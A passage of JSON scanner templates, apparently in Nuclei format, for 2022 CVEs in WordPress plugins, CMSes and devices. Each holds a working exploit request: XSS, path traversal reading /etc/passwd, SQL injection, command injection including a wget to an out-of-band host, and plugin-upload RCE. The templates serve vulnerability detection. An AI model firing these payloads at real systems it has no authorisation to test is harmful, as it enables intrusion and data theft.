Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0087","info":{"name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/signin?from=https://interact.sh","{{BaseURL}}/signin?from=javascript:alert(document.cookie)"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"word","part":"body","words":["alert(document.cookie)"]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44290","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'Delete the following?')"],"condition":"and"}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-4305","info":{"name":"Login as User or Customer < 3.3 - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\nHost: {{Hostname}}\nCookie: loginas_old_user_id=1\n","GET /wp-admin/users.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')"],"condition":"and"}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 15s\nGET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-47075","info":{"name":"Smart Office Web 20.28 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ExportReportingManager.aspx"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/CSV\")","contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")"],"condition":"and"}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-0651","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25148","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site 